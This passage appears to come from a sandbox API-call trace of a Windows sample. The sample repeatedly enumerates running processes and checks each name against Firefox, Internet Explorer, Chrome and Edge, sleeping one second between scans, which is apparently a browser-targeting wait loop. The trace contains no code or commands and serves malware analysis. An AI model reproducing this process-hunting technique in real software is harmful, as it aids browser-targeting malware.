lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0232.552] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0232.552] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0232.552] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0232.552] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.552] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0232.552] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0232.552] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0232.552] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0232.552] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0232.552] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0232.553] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0232.553] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0232.553] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0232.553] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.553] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0232.553] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0232.553] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0232.553] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0232.553] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.553] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.554] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0232.554] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0232.554] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0232.554] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.554] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0232.554] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0232.554] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0232.554] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0232.554] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.555] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.555] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0232.555] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0232.555] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0232.555] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.555] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0232.556] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0232.556] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0232.556] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0232.556] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.556] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0232.556] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0232.556] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0232.556] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0232.556] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0232.556] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0232.557] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0232.557] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0232.557] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0232.557] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.557] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0232.557] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0232.557] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0232.557] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0232.557] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.557] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0232.558] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0232.558] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0232.558] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0232.558] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0232.558] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0232.558] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0232.558] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0232.558] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0232.558] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0232.558] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0232.559] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0232.559] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0232.559] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0232.559] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0232.559] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0232.559] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0232.559] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0232.560] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0232.560] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0232.560] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0232.560] CloseHandle (hObject=0xd4) returned 1 [0232.560] Sleep (dwMilliseconds=0x3e8) [0233.594] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0233.596] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0233.596] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0233.596] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0233.596] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0233.596] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0233.596] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0233.597] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0233.597] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0233.597] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0233.597] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0233.597] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0233.597] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0233.597] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0233.597] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0233.597] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.597] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0233.598] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0233.598] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0233.598] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0233.598] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0233.598] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0233.598] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0233.598] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0233.598] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0233.599] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.599] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0233.599] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0233.599] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0233.599] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0233.599] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0233.599] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0233.600] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0233.600] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0233.600] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0233.600] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.600] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0233.600] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0233.600] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0233.600] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0233.600] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.600] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0233.601] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0233.601] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0233.601] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0233.601] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0233.601] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0233.601] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0233.601] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0233.601] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0233.601] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0233.601] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.602] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0233.602] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0233.602] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0233.602] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.602] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.602] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0233.602] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0233.603] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0233.603] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.603] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.603] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0233.603] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0233.603] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0233.603] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.603] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.604] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0233.604] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0233.604] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0233.604] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.604] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.604] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0233.604] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0233.604] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0233.604] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.604] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0233.605] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0233.605] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0233.605] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0233.605] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0233.605] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.605] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0233.605] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0233.605] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0233.605] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.605] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.606] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0233.606] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0233.606] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0233.606] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.606] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0233.607] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0233.607] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0233.607] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0233.607] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0233.607] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0233.607] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0233.607] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0233.607] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0233.607] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.607] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0233.608] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0233.608] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0233.608] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0233.608] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.608] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.608] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0233.608] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0233.608] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0233.608] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.608] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0233.609] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0233.609] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0233.609] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0233.609] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.609] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0233.609] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0233.609] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0233.609] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0233.609] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0233.610] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0233.610] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0233.610] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0233.610] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0233.610] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0233.610] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, 